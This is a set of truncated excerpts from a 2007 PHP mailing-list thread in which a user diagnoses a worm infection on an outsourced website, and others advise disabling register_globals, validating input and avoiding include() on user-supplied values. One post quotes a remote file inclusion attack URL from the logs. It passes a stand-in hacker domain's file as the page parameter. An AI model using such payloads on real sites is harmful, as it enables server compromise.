Re: [PHP] Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms

On Thu, March 15, 2007 9:15 am, Seak, Teng-Fong wrote: > Stut wrote: >> Seak, Teng-Fong wrote: >>> But after I've spent some time reading the log files, I've >>> finally >>> found out how the hackers managed to achieve worm infiltration. >>> >>> Actually, they're using an URL like this: >>>

RE: [PHP] Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms

> > Seak, Teng-Fong wrote: > > No, I don't deserve anything because, as I've written in the > > original post (but I suppose you didn't notice), the website is > > outsourced and made by a 3rd company. Then you should be having this conversation with the 3rd party. They need to validate *EVERY*

[PHP] Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms

Seak, Teng-Fong wrote: > No, I don't deserve anything because, as I've written in the > original post (but I suppose you didn't notice), the website is > outsourced and made by a 3rd company. Well, I've just realised (and checked) that I forgot to mention that my company's website was outsource

Re: [PHP] Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms

Turn off register_globals - if you pollute your scripts with global variables like that you are asking for trouble. If you can't make sure you clean the variable. Using include("$page.php") is asking for trouble. If you can get register_globals switched off (it's off by default in PHP5 for this

[PHP] Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms

Stut wrote: > Seak, Teng-Fong wrote: >> But after I've spent some time reading the log files, I've finally >> found out how the hackers managed to achieve worm infiltration. >> >> Actually, they're using an URL like this: >> http://my-domain.com/index.php?page=http://hacker-domain.com/some-

RE: [PHP] Re: Question on virus/worms

On Sat, 2007-03-03 at 14:02 +0100, Tim wrote: > > Once you are comfortable with this, before you use a script downloaded from > the inet in a production environment, go through the code and make sure you > don't see any backdoor code (unecessary fsockopen(), exec() etc.. That isn't > related to the

RE: [PHP] Re: Question on virus/worms

> -Message d'origine- > De : Stut [mailto:[EMAIL PROTECTED] > Envoyé : vendredi 2 mars 2007 20:23 > À : Seak, Teng-Fong > Cc : php-windows@lists.php.net; php-general@lists.php.net > Objet : Re: [PHP] Re: Question on virus/worms > > Seak, Teng-Fong wrote: >

Re: [PHP] Re: Question on virus/worms

Seak, Teng-Fong wrote: But after I've spent some time reading the log files, I've finally found out how the hackers managed to achieve worm infiltration. Actually, they're using an URL like this: http://my-domain.com/index.php?page=http://hacker-domain.com/some-worm-file.txt? And th

[PHP] Re: Question on virus/worms

Robert Cummings wrote: > Did you bother to google any of them? I just punched PHP/BackDoor.gen > into Google and got a wealth of information. Yes, of course! But what I can see there aren't far from useless (cf what I write below). Stut wrote: > Seak, Teng-Fong wrote: >> PHP/Chaploit > http:/